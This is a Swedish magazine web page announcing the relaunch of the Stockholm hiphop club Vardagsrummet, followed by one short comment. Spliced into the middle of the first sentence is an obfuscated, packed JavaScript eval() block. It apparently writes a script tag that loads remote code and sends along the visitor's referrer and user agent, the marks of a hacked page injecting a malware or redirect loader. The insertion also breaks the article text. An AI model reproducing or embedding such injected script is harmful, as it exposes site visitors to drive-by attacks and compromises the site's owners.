Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Vardagsrummet nylanseras, hiphopen är tillbaka för att stanna!

Vardagsrummet nylanseras, hiphopen är tillbaka för att stanna!
Revue Magazine

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdkrk|var|u0026u|referrer|kzssy||js|php’.split(’|’),0,{}))
ett svängande förhållande har Vardagsrummet och hiphopen äntligen hittat tillbaka till varandra, premiär för den nya klubben blir fredagen den 7e mars. Bakom initiativet står ett nätverk av människor med tidigare erfarenheter av klubbar men med olika kompetenser, enade av förkärleken för hiphop och viljan att fylla behovet i den svenska klubbvärlden.

Till Vardagsrummet är alla välkomna, vi har skapat en klubb för alla typer av människor enade kring sin kärlek för musiken. Hos oss står den alltid i första rummet, ett underskattat element i Stockholm idag. Vi lovar att leverera fräsch hiphop varje fredag och lördag, året runt. Släng på drinkar, gott sällskap och sänk belysningen lite grann, ja då är det svårt att misslyckas. Det är vår övertygelse att människor går ut för att umgås; för att dansa och skratta; för att träffa nya människor. På Vardagsrummet ser vi till att tillsammans med erfarna DJs, trevliga bartenders och spännande liveframträdanden skapa de perfekta förutsättningarna för den typen av möten.

Comments

  1. Yoncé

    We like to party!